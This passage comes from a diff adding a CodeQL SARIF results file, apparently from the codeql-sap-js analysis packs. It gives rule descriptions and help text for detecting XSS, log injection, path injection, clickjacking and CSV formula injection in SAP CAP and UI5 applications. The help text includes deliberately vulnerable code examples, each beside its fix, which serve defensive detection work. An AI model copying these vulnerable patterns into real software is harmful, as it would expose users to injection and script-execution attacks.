CQL query from user-controlled sources is vulnerable to insertion of\n malicious code by the user.", + "id" : "js/cap-sql-injection", + "kind" : "path-problem", + "name" : "CQL query built from user-controlled sources", + "precision" : "high", + "problem.severity" : "error", + "security-severity" : "8.8" + } + }, { + "id" : "js/cap-log-injection", + "name" : "js/cap-log-injection", + "shortDescription" : { + "text" : "CAP Log injection" + }, + "fullDescription" : { + "text" : "Building log entries from user-controlled sources is vulnerable to insertion of forged log entries by a malicious user." + }, + "defaultConfiguration" : { + "enabled" : true, + "level" : "error" + }, + "help" : { + "text" : "# CAP Log Injection\n\nIf unsanitized user input is written to a log entry using the CAP Node.js logging API, a malicious user may be able to forge new log entries.\n\nCAP Node.js offers a CLRF-safe logging API that should be used for application log entries that are logged as plaintext. If the entry is interpreted as HTML, then arbitrary HTML code my be included to forge log entries.\n\n## Recommendation\n\nCAP applications need to care for escaping user data that is used as input parameter for application logging. It's recommended to make use of an existing Encoder such as OWASP ESAPI.\n\n## Examples\n\nThis CAP service directly logs what the user submitted via the `req` request.\n\n``` javascript\nimport cds from '@sap/cds'\nconst { Books } = cds.entities ('sap.capire.bookshop')\n\nclass SampleVulnService extends cds.ApplicationService { init(){\n this.on ('submitOrder', async req => {\n const {book,quantity} = req.data\n const LOG = cds.log(\"nodejs\");\n LOG.info(\"test\" + book); // Log injection alert\n })\n\n return super.init()\n}}\n```\n\n## References\n\n- OWASP: [Log Injection](https://owasp.org/www-community/attacks/Log_Injection).\n- OWASP: [Log Injection Cheat Sheet](https://cheatsheetseries.owasp.org/cheatsheets/Logging_Cheat_Sheet.html).\n- SAP CAPire Documentation: [Security Aspects](https://cap.cloud.sap/docs/guides/security/aspects#common-injection-attacks).\n", + "markdown" : "# CAP Log Injection\n\nIf unsanitized user input is written to a log entry using the CAP Node.js logging API, a malicious user may be able to forge new log entries.\n\nCAP Node.js offers a CLRF-safe logging API that should be used for application log entries that are logged as plaintext. If the entry is interpreted as HTML, then arbitrary HTML code my be included to forge log entries.\n\n## Recommendation\n\nCAP applications need to care for escaping user data that is used as input parameter for application logging. It's recommended to make use of an existing Encoder such as OWASP ESAPI.\n\n## Examples\n\nThis CAP service directly logs what the user submitted via the `req` request.\n\n``` javascript\nimport cds from '@sap/cds'\nconst { Books } = cds.entities ('sap.capire.bookshop')\n\nclass SampleVulnService extends cds.ApplicationService { init(){\n this.on ('submitOrder', async req => {\n const {book,quantity} = req.data\n const LOG = cds.log(\"nodejs\");\n LOG.info(\"test\" + book); // Log injection alert\n })\n\n return super.init()\n}}\n```\n\n## References\n\n- OWASP: [Log Injection](https://owasp.org/www-community/attacks/Log_Injection).\n- OWASP: [Log Injection Cheat Sheet](https://cheatsheetseries.owasp.org/cheatsheets/Logging_Cheat_Sheet.html).\n- SAP CAPire Documentation: [Security Aspects](https://cap.cloud.sap/docs/guides/security/aspects#common-injection-attacks).\n" + }, + "properties" : { + "tags" : [ "security" ], + "description" : "Building log entries from user-controlled sources is vulnerable to\n insertion of forged log entries by a malicious user.", + "id" : "js/cap-log-injection", + "kind" : "path-problem", + "name" : "CAP Log injection", + "precision" : "medium", + "problem.severity" : "error", + "security-severity" : "6.1" + } + } ], + "locations" : [ { + "uri" : "file:///home/runner/work/codeql-sap-js/codeql-sap-js/javascript/frameworks/cap/src/", + "description" : { + "text" : "The QL pack root directory." + } + }, { + "uri" : "file:///home/runner/work/codeql-sap-js/codeql-sap-js/javascript/frameworks/cap/src/qlpack.yml", + "description" : { + "text" : "The QL pack definition file." + } + } ] + }, { + "name" : "generated/extension-pack", + "semanticVersion" : "0.0.0", + "locations" : [ { + "uri" : "file:///home/runner/work/_temp/codeql_databases/javascript/temp/extension-pack/", + "description" : { + "text" : "The QL pack root directory." + } + }, { + "uri" : "file:///home/runner/work/_temp/codeql_databases/javascript/temp/extension-pack/codeql-pack.yml", + "description" : { + "text" : "The QL pack definition file." + } + } ] + }, { + "name" : "advanced-security/javascript-sap-ui5-queries", + "semanticVersion" : "0.6.0+ffea18ba020c5590287d2f25b90825ce0c7cf055", + "rules" : [ { + "id" : "js/ui5-xss", + "name" : "js/ui5-xss", + "shortDescription" : { + "text" : "UI5 Client-side cross-site scripting" + }, + "fullDescription" : { + "text" : "Writing user input directly to a UI5 View allows for a cross-site scripting vulnerability." + }, + "defaultConfiguration" : { + "enabled" : true, + "level" : "error" + }, + "help" : { + "text" : "# Client-side cross-site scripting\n\nReceiving text from the user, most notably through a control, and rendering it as HTML in another control can lead to a cross-site scripting vulnerability.\n\n## Recommendation\n\n### Preventing XSS Involving User Defined Control\n\nIf the XSS attack vector includes a user-defined control, then we can mitigate the issue by sanitizing the user-provided input in the implementation of the control:\n- Where possible, define the property type to something other than `string` or `any`. If a value should be used, then opt for the `enum` type which only allows a predefined set of strings.\n- Use escaping functions in `sap.base.security`. Relevant sanitizers include `encodeXML` and `encodeHTML`.\n- When using API with `apiVersion: 2` (Semantic Rendering), do not use `RenderManager.unsafeHtml` unless the control property `sanitizeContent` is set to `true`.\n- When using the now-deprecated older API with `RenderManager.write` or `RenderManager.writeAttribute`, use their respective counterparts `RenderManager.writeEscaped` and `RenderManager.writeAttributeEscaped` which sanitizes their rendered contents.\n\n### Preventing XSS Not Involving User Defined Control\n\nAn XSS attack vector can still exist even when no user-defined control is used. In this case, a model property or a control property act as an intermediate step when external data is passed in.\nIn this case, the UI5 application should not use the property as is, but should sanitize the contents before reading it. Such sanitization can take place in the controller or in the view declaration using expression bindings.\n\n## Example\n\n### Custom Control with Custom Rendering Method\n\nThis custom control `vulnerable.control.xss` calls `unsafeHtml` on a given `RenderManager` instance in its static renderer function. Since its `text` property is an unrestricted string type, it can point to a string with contents that can be interpreted as HTML. If it is the case, `unsafeHtml` will render the string, running a possibly embedded JavaScript code in it.\n\n```javascript\nsap.ui.define([\"sap/ui/core/Control\"], function (Control) {\n return Control.extend(\"vulnerable.control.xss\", {\n metadata: { properties: { text: { type: \"string\" } } },\n renderer: {\n apiVersion: 2,\n render: function (oRm, oControl) {\n oRm.openStart(\"div\", oControl);\n oRm.unsafeHtml(oControl.getText()); // sink\n oRm.close(\"div\");\n }\n }\n });\n})\n```\n\nThis is the same custom control without the possibility of XSS using several means of sanitization: The property `text` is enforced to a non-string type, hence disallows unrestricted strings (This is espcially applicable if the expected input is a number anyways). Also, the `sap.base.security.encodeXML` function is used to escape HTML control characters.\n\n```javascript\nsap.ui.define([\"sap/ui/core/Control\", \"sap/base/security/encodeXML\"], function (Control, encodeXML) {\n return Control.extend(\"vulnerable.control.xss\", {\n metadata: { properties: { text: { type: \"int\" } } }, // constrain the type\n renderer: {\n apiVersion: 2,\n render: function (oRm, oControl) {\n oRm.openStart(\"div\", oControl);\n oRm.unsafeHtml(encodeXML(oControl.getText()); // encode using security functions\n oRm.close(\"div\");\n }\n }\n });\n})\n```\n\n### Library Control\n\nThis example contains only library controls that are not user-defined. The untrusted user input flows from `sap.m.Input` and directly flows out via `sap.ui.core.HTML` through the model property `input` as declared in the `onInit` method of the controller.\n\n``` xml\n\n \t \n \n\n```\n\n``` javascript\nsap.ui.define([\"sap/ui/core/mvc/Controller\", \"sap/ui/model/json/JSONModel\"],\n function (Controller, JSONModel) {\n return Controller.extend(\"vulnerable.controller.app\", {\n onInit: function () {\n var oData = { input: null };\n var oModel = new JSONModel(oData);\n this.getView().setModel(oModel);\n },\n });\n },\n);\n```\n\nThe issue can be resolved by setting the `HTML` control's `sanitizeContent` attribute to true.\n\n``` xml\n\n \n \n\n```\n\n## References\n\n- OWASP: [DOM Based XSS](https://owasp.org/www-community/attacks/DOM_Based_XSS).\n- SAP UI5 Documentation: [Cross-site Scripting](https://sapui5.hana.ondemand.com/sdk/#/topic/91f0bd316f4d1014b6dd926db0e91070.html) in UI5.\n- SAP UI5 Documentation: [Prevention of Cross-site Scripting](https://sapui5.hana.ondemand.com/sdk/#/topic/4de64e2e191f4a7297d4fd2d1e233a2d.html) in UI5.\n- SAP UI5 Documentation: [API Documentation of sap.ui.core.RenderManager](https://sapui5.hana.ondemand.com/sdk/#/api/sap.ui.core.RenderManager).\n- SAP UI5 Documentation: [Defining Control Properties](https://sapui5.hana.ondemand.com/sdk/#/topic/ac56d92162ed47ff858fdf1ce26c18c4.html).\n- SAP UI5 Documentation: [Expression Binding](https://sapui5.hana.ondemand.com/sdk/#/topic/daf6852a04b44d118963968a1239d2c0).\n- SAP UI5 API Reference: [`sap.ui.core.HTML`](https://sapui5.hana.ondemand.com/sdk/#/api/sap.ui.core.HTML%23methods/setSanitizeContent).\n- Common Weakness Enumeration: [CWE-79](https://cwe.mitre.org/data/definitions/79.html).\n- Common Weakness Enumeration: [CWE-116](https://cwe.mitre.org/data/definitions/116.html).\n", + "markdown" : "# Client-side cross-site scripting\n\nReceiving text from the user, most notably through a control, and rendering it as HTML in another control can lead to a cross-site scripting vulnerability.\n\n## Recommendation\n\n### Preventing XSS Involving User Defined Control\n\nIf the XSS attack vector includes a user-defined control, then we can mitigate the issue by sanitizing the user-provided input in the implementation of the control:\n- Where possible, define the property type to something other than `string` or `any`. If a value should be used, then opt for the `enum` type which only allows a predefined set of strings.\n- Use escaping functions in `sap.base.security`. Relevant sanitizers include `encodeXML` and `encodeHTML`.\n- When using API with `apiVersion: 2` (Semantic Rendering), do not use `RenderManager.unsafeHtml` unless the control property `sanitizeContent` is set to `true`.\n- When using the now-deprecated older API with `RenderManager.write` or `RenderManager.writeAttribute`, use their respective counterparts `RenderManager.writeEscaped` and `RenderManager.writeAttributeEscaped` which sanitizes their rendered contents.\n\n### Preventing XSS Not Involving User Defined Control\n\nAn XSS attack vector can still exist even when no user-defined control is used. In this case, a model property or a control property act as an intermediate step when external data is passed in.\nIn this case, the UI5 application should not use the property as is, but should sanitize the contents before reading it. Such sanitization can take place in the controller or in the view declaration using expression bindings.\n\n## Example\n\n### Custom Control with Custom Rendering Method\n\nThis custom control `vulnerable.control.xss` calls `unsafeHtml` on a given `RenderManager` instance in its static renderer function. Since its `text` property is an unrestricted string type, it can point to a string with contents that can be interpreted as HTML. If it is the case, `unsafeHtml` will render the string, running a possibly embedded JavaScript code in it.\n\n```javascript\nsap.ui.define([\"sap/ui/core/Control\"], function (Control) {\n return Control.extend(\"vulnerable.control.xss\", {\n metadata: { properties: { text: { type: \"string\" } } },\n renderer: {\n apiVersion: 2,\n render: function (oRm, oControl) {\n oRm.openStart(\"div\", oControl);\n oRm.unsafeHtml(oControl.getText()); // sink\n oRm.close(\"div\");\n }\n }\n });\n})\n```\n\nThis is the same custom control without the possibility of XSS using several means of sanitization: The property `text` is enforced to a non-string type, hence disallows unrestricted strings (This is espcially applicable if the expected input is a number anyways). Also, the `sap.base.security.encodeXML` function is used to escape HTML control characters.\n\n```javascript\nsap.ui.define([\"sap/ui/core/Control\", \"sap/base/security/encodeXML\"], function (Control, encodeXML) {\n return Control.extend(\"vulnerable.control.xss\", {\n metadata: { properties: { text: { type: \"int\" } } }, // constrain the type\n renderer: {\n apiVersion: 2,\n render: function (oRm, oControl) {\n oRm.openStart(\"div\", oControl);\n oRm.unsafeHtml(encodeXML(oControl.getText()); // encode using security functions\n oRm.close(\"div\");\n }\n }\n });\n})\n```\n\n### Library Control\n\nThis example contains only library controls that are not user-defined. The untrusted user input flows from `sap.m.Input` and directly flows out via `sap.ui.core.HTML` through the model property `input` as declared in the `onInit` method of the controller.\n\n``` xml\n\n \t \n \n\n```\n\n``` javascript\nsap.ui.define([\"sap/ui/core/mvc/Controller\", \"sap/ui/model/json/JSONModel\"],\n function (Controller, JSONModel) {\n return Controller.extend(\"vulnerable.controller.app\", {\n onInit: function () {\n var oData = { input: null };\n var oModel = new JSONModel(oData);\n this.getView().setModel(oModel);\n },\n });\n },\n);\n```\n\nThe issue can be resolved by setting the `HTML` control's `sanitizeContent` attribute to true.\n\n``` xml\n\n \n \n\n```\n\n## References\n\n- OWASP: [DOM Based XSS](https://owasp.org/www-community/attacks/DOM_Based_XSS).\n- SAP UI5 Documentation: [Cross-site Scripting](https://sapui5.hana.ondemand.com/sdk/#/topic/91f0bd316f4d1014b6dd926db0e91070.html) in UI5.\n- SAP UI5 Documentation: [Prevention of Cross-site Scripting](https://sapui5.hana.ondemand.com/sdk/#/topic/4de64e2e191f4a7297d4fd2d1e233a2d.html) in UI5.\n- SAP UI5 Documentation: [API Documentation of sap.ui.core.RenderManager](https://sapui5.hana.ondemand.com/sdk/#/api/sap.ui.core.RenderManager).\n- SAP UI5 Documentation: [Defining Control Properties](https://sapui5.hana.ondemand.com/sdk/#/topic/ac56d92162ed47ff858fdf1ce26c18c4.html).\n- SAP UI5 Documentation: [Expression Binding](https://sapui5.hana.ondemand.com/sdk/#/topic/daf6852a04b44d118963968a1239d2c0).\n- SAP UI5 API Reference: [`sap.ui.core.HTML`](https://sapui5.hana.ondemand.com/sdk/#/api/sap.ui.core.HTML%23methods/setSanitizeContent).\n- Common Weakness Enumeration: [CWE-79](https://cwe.mitre.org/data/definitions/79.html).\n- Common Weakness Enumeration: [CWE-116](https://cwe.mitre.org/data/definitions/116.html).\n" + }, + "properties" : { + "tags" : [ "security", "external/cwe/cwe-079", "external/cwe/cwe-116" ], + "description" : "Writing user input directly to a UI5 View allows for\n a cross-site scripting vulnerability.", + "id" : "js/ui5-xss", + "kind" : "path-problem", + "name" : "UI5 Client-side cross-site scripting", + "precision" : "high", + "problem.severity" : "error", + "security-severity" : "6.1" + } + }, { + "id" : "js/ui5-clickjacking", + "name" : "js/ui5-clickjacking", + "shortDescription" : { + "text" : "UI5 Clickjacking" + }, + "fullDescription" : { + "text" : "The absence of frame options allows for clickjacking." + }, + "defaultConfiguration" : { + "enabled" : true, + "level" : "error" + }, + "help" : { + "text" : "# Clickjacking\n\nUI5 applications that do not explicitly set the frame options to `deny` may be vulnerable to UI redress attacks (”clickjacking”). In these attacks, the vulnerable site is loaded in a frame on an attacker-controlled site which uses opaque or transparent layers to trick the user into unintentionally clicking a button or link on the vulnerable site.\n\n## Recommendation\n\nExplicitly set the frame options to `\"deny\"`, either through `window[\"sap-ui-config\"]`, or `data-sap-ui-frameOptions` attribute of the script tag where it sources the bootstrap script `\"sap-ui-core.js\"`:\n\n``` javascript\nwindow[\"sap-ui-config\"] = {\n frameOptions: \"deny\",\n ...\n};\n```\n\n``` javascript\nwindow[\"sap-ui-config\"].frameOptions = \"deny\";\n```\n\n``` html\n\n```\n\n## Example\n\n### Setting the Frame Options to `\"allow\"`\n\nThis UI5 application explicitly allows to be embedded in other applications.\n\n```javascript\n\n\n \n ...\n \n\n \n \n ...\n\n```\n\n### Not Setting the Frame Options to Anything\n\nThe default value of `window[\"sap-ui-config\"]` and `data-sap-ui-frameOptions` are both `\"allow\"`, which makes leaving it untouched allows the application to be embedded.\n\n## References\n* OWASP: [Clickjacking Defense Cheat Sheet](https://cheatsheetseries.owasp.org/cheatsheets/Clickjacking_Defense_Cheat_Sheet.html).\n* Mozilla: [X-Frame-Options](https://developer.mozilla.org/en-US/docs/Web/HTTP/Headers/X-Frame-Options).\n* SAP UI5 Documentation: [Frame Options](https://sapui5.hana.ondemand.com/sdk/#/topic/62d9c4d8f5ad49aa914624af9551beb7.html).\n* SAP UI5 Documentation: [Allowlist Service](https://sapui5.hana.ondemand.com/sdk/#/topic/d04a6d41480c4396af16b5d2b25509ec.html).\n* Common Weakness Enumeration: [CWE-451](https://cwe.mitre.org/data/definitions/451.html).\n", + "markdown" : "# Clickjacking\n\nUI5 applications that do not explicitly set the frame options to `deny` may be vulnerable to UI redress attacks (”clickjacking”). In these attacks, the vulnerable site is loaded in a frame on an attacker-controlled site which uses opaque or transparent layers to trick the user into unintentionally clicking a button or link on the vulnerable site.\n\n## Recommendation\n\nExplicitly set the frame options to `\"deny\"`, either through `window[\"sap-ui-config\"]`, or `data-sap-ui-frameOptions` attribute of the script tag where it sources the bootstrap script `\"sap-ui-core.js\"`:\n\n``` javascript\nwindow[\"sap-ui-config\"] = {\n frameOptions: \"deny\",\n ...\n};\n```\n\n``` javascript\nwindow[\"sap-ui-config\"].frameOptions = \"deny\";\n```\n\n``` html\n\n```\n\n## Example\n\n### Setting the Frame Options to `\"allow\"`\n\nThis UI5 application explicitly allows to be embedded in other applications.\n\n```javascript\n\n\n \n ...\n \n\n \n \n ...\n\n```\n\n### Not Setting the Frame Options to Anything\n\nThe default value of `window[\"sap-ui-config\"]` and `data-sap-ui-frameOptions` are both `\"allow\"`, which makes leaving it untouched allows the application to be embedded.\n\n## References\n* OWASP: [Clickjacking Defense Cheat Sheet](https://cheatsheetseries.owasp.org/cheatsheets/Clickjacking_Defense_Cheat_Sheet.html).\n* Mozilla: [X-Frame-Options](https://developer.mozilla.org/en-US/docs/Web/HTTP/Headers/X-Frame-Options).\n* SAP UI5 Documentation: [Frame Options](https://sapui5.hana.ondemand.com/sdk/#/topic/62d9c4d8f5ad49aa914624af9551beb7.html).\n* SAP UI5 Documentation: [Allowlist Service](https://sapui5.hana.ondemand.com/sdk/#/topic/d04a6d41480c4396af16b5d2b25509ec.html).\n* Common Weakness Enumeration: [CWE-451](https://cwe.mitre.org/data/definitions/451.html).\n" + }, + "properties" : { + "tags" : [ "security", "external/cwe/cwe-451" ], + "description" : "The absence of frame options allows for clickjacking.", + "id" : "js/ui5-clickjacking", + "kind" : "problem", + "name" : "UI5 Clickjacking", + "precision" : "medium", + "problem.severity" : "error", + "security-severity" : "6.1" + } + }, { + "id" : "js/ui5-path-injection", + "name" : "js/ui5-path-injection", + "shortDescription" : { + "text" : "UI5 Path Injection" + }, + "fullDescription" : { + "text" : "Constructing path from an uncontrolled remote source to be passed to a filesystem API allows for manipulation of the local filesystem." + }, + "defaultConfiguration" : { + "enabled" : true, + "level" : "error" + }, + "help" : { + "text" : "# Client-side path injection\n\nUI5 applications that access files using a dynamically configured path are vulnerable to injection attacks that allow an attacker to manipulate the file location.\n\n## Recommendation\n\n### Make path argument independent of the user input\n\nIf possible, do not parameterize the path on a user input. Either hardcode the path string in the source, or use only strings that are created within the application.\n\n### Keep an allow-list of safe paths\n\nKeep a strict allow-list of safe paths to load from or send requests to. Before loading a script from a location outside the application or making an API request to a location, check if the path is contained in the list of safe paths. Also, make sure that the allow-list is kept up to date.\n\n### Check the script into the repository or use package managers\n\nSince the URL of the script may be pointing to a web server vulnerable to being hijacked, it may be a good idea to check a stable version of the script into the repository to increase the degree of control. If not possible, use a trusted package manager such as `npm`.\n\n## Example\n\n### Including scripts from an untrusted domain\n\n``` javascript\nsap.ui.require([\n \"sap/ui/dom/includeScript\"\n ],\n function(includeScript) {\n includeScript(\"http://some.vulnerable.domain/some-script.js\");\n }\n);\n```\n\nIf the vulnerable domain is outside the organization and controlled by an untrusted third party, this may result in arbitrary code execution in the user's browser.\n\n### Using user input as a name of a file to be saved\n\nSuppose a controller is configured to receive a response from a server as follows.\n\n``` javascript\nsap.ui.define([\n \"sap/ui/core/mvc/Controller\",\n \"sap/ui/core/util/File\"\n ],\n function(Controller, File) {\n return Controller.extend(\"vulnerable.controller.app\", {\n onInit: function() {\n let oDataV2Model = this.getOwnerComponent().getModel(\"some-ODatav2-model\");\n this.getView().setModel(oDataV2Model);\n },\n \n onSomeEvent: function() {\n let remoteResponse = this.getView().getModel().getProperty(\"someProperty\");\n File.save(\"some-content\", remoteResponse, \"txt\", \"text/plain\", \"utf-8\");\n }\n });\n });\n```\n\nEven if the server which updates the OData V2 model is in a trusted domain such as within the organization, the server may still contain tainted information if the UI5 application in question is vulnerable to other security attacks, say XSS. This may allow an attacker to save a file in the victim's local filesystem.\n\n## References\n\n- Common Weakness Enumeration: [CWE-829](https://cwe.mitre.org/data/definitions/829.html).\n- Common Weakness Enumeration: [CWE-073](https://cwe.mitre.org/data/definitions/73.html).\n- SAP UI5 API Reference: [`sap.ui.core.util.File`](https://sapui5.hana.ondemand.com/sdk/#/api/sap.ui.core.util.File%23methods/sap.ui.core.util.File.save).\n- SAP UI5 API Reference: [`sap.ui.dom.includeScript`](https://sapui5.hana.ondemand.com/sdk/#/api/module:sap/ui/dom/includeScript) and [`sap.ui.dom.includeStyleSheet`](https://sapui5.hana.ondemand.com/sdk/#/api/module:sap/ui/dom/includeStylesheet).\n- SAP UI5 API Reference: [`jQuery.sap.includeScript`](https://sapui5.hana.ondemand.com/sdk/#/api/module:sap/ui/dom/includeScript) and [`jQuery.sap.includeStyleSheet`](https://sapui5.hana.ondemand.com/sdk/#/api/module:sap/ui/dom/includeScript).\n", + "markdown" : "# Client-side path injection\n\nUI5 applications that access files using a dynamically configured path are vulnerable to injection attacks that allow an attacker to manipulate the file location.\n\n## Recommendation\n\n### Make path argument independent of the user input\n\nIf possible, do not parameterize the path on a user input. Either hardcode the path string in the source, or use only strings that are created within the application.\n\n### Keep an allow-list of safe paths\n\nKeep a strict allow-list of safe paths to load from or send requests to. Before loading a script from a location outside the application or making an API request to a location, check if the path is contained in the list of safe paths. Also, make sure that the allow-list is kept up to date.\n\n### Check the script into the repository or use package managers\n\nSince the URL of the script may be pointing to a web server vulnerable to being hijacked, it may be a good idea to check a stable version of the script into the repository to increase the degree of control. If not possible, use a trusted package manager such as `npm`.\n\n## Example\n\n### Including scripts from an untrusted domain\n\n``` javascript\nsap.ui.require([\n \"sap/ui/dom/includeScript\"\n ],\n function(includeScript) {\n includeScript(\"http://some.vulnerable.domain/some-script.js\");\n }\n);\n```\n\nIf the vulnerable domain is outside the organization and controlled by an untrusted third party, this may result in arbitrary code execution in the user's browser.\n\n### Using user input as a name of a file to be saved\n\nSuppose a controller is configured to receive a response from a server as follows.\n\n``` javascript\nsap.ui.define([\n \"sap/ui/core/mvc/Controller\",\n \"sap/ui/core/util/File\"\n ],\n function(Controller, File) {\n return Controller.extend(\"vulnerable.controller.app\", {\n onInit: function() {\n let oDataV2Model = this.getOwnerComponent().getModel(\"some-ODatav2-model\");\n this.getView().setModel(oDataV2Model);\n },\n \n onSomeEvent: function() {\n let remoteResponse = this.getView().getModel().getProperty(\"someProperty\");\n File.save(\"some-content\", remoteResponse, \"txt\", \"text/plain\", \"utf-8\");\n }\n });\n });\n```\n\nEven if the server which updates the OData V2 model is in a trusted domain such as within the organization, the server may still contain tainted information if the UI5 application in question is vulnerable to other security attacks, say XSS. This may allow an attacker to save a file in the victim's local filesystem.\n\n## References\n\n- Common Weakness Enumeration: [CWE-829](https://cwe.mitre.org/data/definitions/829.html).\n- Common Weakness Enumeration: [CWE-073](https://cwe.mitre.org/data/definitions/73.html).\n- SAP UI5 API Reference: [`sap.ui.core.util.File`](https://sapui5.hana.ondemand.com/sdk/#/api/sap.ui.core.util.File%23methods/sap.ui.core.util.File.save).\n- SAP UI5 API Reference: [`sap.ui.dom.includeScript`](https://sapui5.hana.ondemand.com/sdk/#/api/module:sap/ui/dom/includeScript) and [`sap.ui.dom.includeStyleSheet`](https://sapui5.hana.ondemand.com/sdk/#/api/module:sap/ui/dom/includeStylesheet).\n- SAP UI5 API Reference: [`jQuery.sap.includeScript`](https://sapui5.hana.ondemand.com/sdk/#/api/module:sap/ui/dom/includeScript) and [`jQuery.sap.includeStyleSheet`](https://sapui5.hana.ondemand.com/sdk/#/api/module:sap/ui/dom/includeScript).\n" + }, + "properties" : { + "tags" : [ "security", "external/cwe/cwe-022", "external/cwe/cwe-035" ], + "description" : "Constructing path from an uncontrolled remote source to be passed\n to a filesystem API allows for manipulation of the local filesystem.", + "id" : "js/ui5-path-injection", + "kind" : "path-problem", + "name" : "UI5 Path Injection", + "precision" : "medium", + "problem.severity" : "error", + "security-severity" : "7.8" + } + }, { + "id" : "js/ui5-log-injection", + "name" : "js/ui5-log-injection", + "shortDescription" : { + "text" : "UI5 Log injection" + }, + "fullDescription" : { + "text" : "Building log entries from user-controlled sources is vulnerable to insertion of forged log entries by a malicious user." + }, + "defaultConfiguration" : { + "enabled" : true, + "level" : "error" + }, + "help" : { + "text" : "# Log Injection\n\nIf an untrusted input, possibly through a UI5 control, is not sanitized and passed onto a logging function, it is possible that a malicious actor submits a crafted input which might lead to forging log entries. If the entries are logged as plaintext, then newline characters may be inserted by the malicious actor. If the entry is interpreted as HTML, then artitrary HTML code my be included to forge log entries.\n\n## Recommendation\n\nAvoid directly logging untrusted input from a remote source and sanitize it by replaceing characters so that the input no longer contains control characters and substrings that may be interpreted as HTML.\n\n## Examples\n\nThis UI5 application directly outputs what the user submitted via the `sap.m.Input` control.\n\n``` xml\n\n \n\n```\n\n``` javascript\nsap.ui.define(\n [\n \"sap/ui/core/mvc/Controller\",\n \"sap/ui/model/json/JSONModel\",\n \"sap/base/Log/info\",\n ],\n function (Controller, JSONModel, info) {\n return Controller.extend(\"vulnerable.controller.app\", {\n onSearchCompleted: function () {\n var oView = this.getView();\n var oSearchField = oView.byId(\"searchTodoItemsInput\");\n var searchValue = oSearchField.getValue();\n info(searchValue); // Sink\n },\n });\n },\n);\n```\n\n## References\n\n- OWASP: [Log Injection](https://owasp.org/www-community/attacks/Log_Injection).\n- OWASP: [Log Injection Cheat Sheet](https://cheatsheetseries.owasp.org/cheatsheets/Logging_Cheat_Sheet.html).\n- SAP UI5 Documentation: [namespace `sap/base/Log`](https://sapui5.hana.ondemand.com/sdk/#api/module:sap/base/Log).\n", + "markdown" : "# Log Injection\n\nIf an untrusted input, possibly through a UI5 control, is not sanitized and passed onto a logging function, it is possible that a malicious actor submits a crafted input which might lead to forging log entries. If the entries are logged as plaintext, then newline characters may be inserted by the malicious actor. If the entry is interpreted as HTML, then artitrary HTML code my be included to forge log entries.\n\n## Recommendation\n\nAvoid directly logging untrusted input from a remote source and sanitize it by replaceing characters so that the input no longer contains control characters and substrings that may be interpreted as HTML.\n\n## Examples\n\nThis UI5 application directly outputs what the user submitted via the `sap.m.Input` control.\n\n``` xml\n\n \n\n```\n\n``` javascript\nsap.ui.define(\n [\n \"sap/ui/core/mvc/Controller\",\n \"sap/ui/model/json/JSONModel\",\n \"sap/base/Log/info\",\n ],\n function (Controller, JSONModel, info) {\n return Controller.extend(\"vulnerable.controller.app\", {\n onSearchCompleted: function () {\n var oView = this.getView();\n var oSearchField = oView.byId(\"searchTodoItemsInput\");\n var searchValue = oSearchField.getValue();\n info(searchValue); // Sink\n },\n });\n },\n);\n```\n\n## References\n\n- OWASP: [Log Injection](https://owasp.org/www-community/attacks/Log_Injection).\n- OWASP: [Log Injection Cheat Sheet](https://cheatsheetseries.owasp.org/cheatsheets/Logging_Cheat_Sheet.html).\n- SAP UI5 Documentation: [namespace `sap/base/Log`](https://sapui5.hana.ondemand.com/sdk/#api/module:sap/base/Log).\n" + }, + "properties" : { + "tags" : [ "security", "external/cwe/cwe-117" ], + "description" : "Building log entries from user-controlled sources is vulnerable to\n insertion of forged log entries by a malicious user.", + "id" : "js/ui5-log-injection", + "kind" : "path-problem", + "name" : "UI5 Log injection", + "precision" : "medium", + "problem.severity" : "error", + "security-severity" : "7.8" + } + }, { + "id" : "js/ui5-formula-injection", + "name" : "js/ui5-formula-injection", + "shortDescription" : { + "text" : "UI5 Formula Injection" + }, + "fullDescription" : { + "text" : "Saving data from an uncontrolled remote source using filesystem or local storage leads to disclosure of sensitive information or forgery of entry." + }, + "defaultConfiguration" : { + "enabled" : true, + "level" : "error" + }, + "help" : { + "text" : "# Formula injection\n\nUI5 applications that save local data, fetched from an uncontrolled remote source, into a CSV file format using generic APIs such as [`sap.ui.core.util.File.save`](https://sapui5.hana.ondemand.com/sdk/#/api/sap.ui.core.util.File%23methods/sap.ui.core.util.File.save) are vulnerable to formula injection, or CSV injection.\n\n## Recommendation\n\n### Escape the leading special characters\n\nCSV cells containing leading special characters such as an equal sign (`=`) may be interpreted as spreadsheet formulas. To prevent them from being interpreted these prefixes should be escaped by surrounding the prefixes with single quotes in order to keep them as literal strings.\n\n### Use a dedicated API function\n\nManual construction of a CSV file using string concatenation is prone to mistakes that can lead to security issues. Instead, a dedicated library function should be used. For example, if the target being exported is a [`sap.m.Table`](https://sapui5.hana.ondemand.com/sdk/#/api/sap.m.Table) and the resulting file is to intended to be opened using a spreadsheet program anyways, then using one of the API functions provided by [`sap.ui.export.Spreadsheet`](https://sapui5.hana.ondemand.com/#/entity/sap.ui.export.Spreadsheet) is the preferred method of achieving the same exporting functionality.\n\n## Example\n\nThe following controller is exporting a CSV file obtained from an event parameter by surrounding it in a pair of semicolons (`;`) as CSV separators.\n\n``` javascript\nsap.ui.define([\n \"sap/ui/core/Controller\",\n \"sap/ui/core/util/File\"\n ], function(Controller, File) {\n return Controller.extend(\"vulnerable.controller.app\", {\n onSomeEvent: function(oEvent) {\n let response = oEvent.getProperty(\"someProperty\").someField;\n let csvRow = \";\" + response + \";\";\n File.save(csvRow, \"someFile\", \"csv\", \"text/csv\", \"utf-8\");\n }\n });\n });\n```\n\n## References\n\n- OWASP: [CSV Injection](https://owasp.org/www-community/attacks/CSV_Injection).\n- Common Weakness Enumeration: [CWE-1236](https://cwe.mitre.org/data/definitions/1236.html).\n- SAP UI5 API Reference: [`sap.ui.export.Spreadsheet`](https://sapui5.hana.ondemand.com/#/entity/sap.ui.export.Spreadsheet).\n- SAP UI5 API Reference: [`sap.ui.core.util.File.save`](https://sapui5.hana.ondemand.com/sdk/#/api/sap.ui.core.util.File%23methods/sap.ui.core.util.File.save).\n", + "markdown" : "# Formula injection\n\nUI5 applications that save local data, fetched from an uncontrolled remote source, into a CSV file format using generic APIs such as [`sap.ui.core.util.File.save`](https://sapui5.hana.ondemand.com/sdk/#/api/sap.ui.core.util.File%23methods/sap.ui.core.util.File.save) are vulnerable to formula injection, or CSV injection.\n\n## Recommendation\n\n### Escape the leading special characters\n\nCSV cells containing leading special characters such as an equal sign (`=`) may be interpreted as spreadsheet formulas. To prevent them from being interpreted these prefixes should be escaped by surrounding the prefixes with single quotes in order to keep them 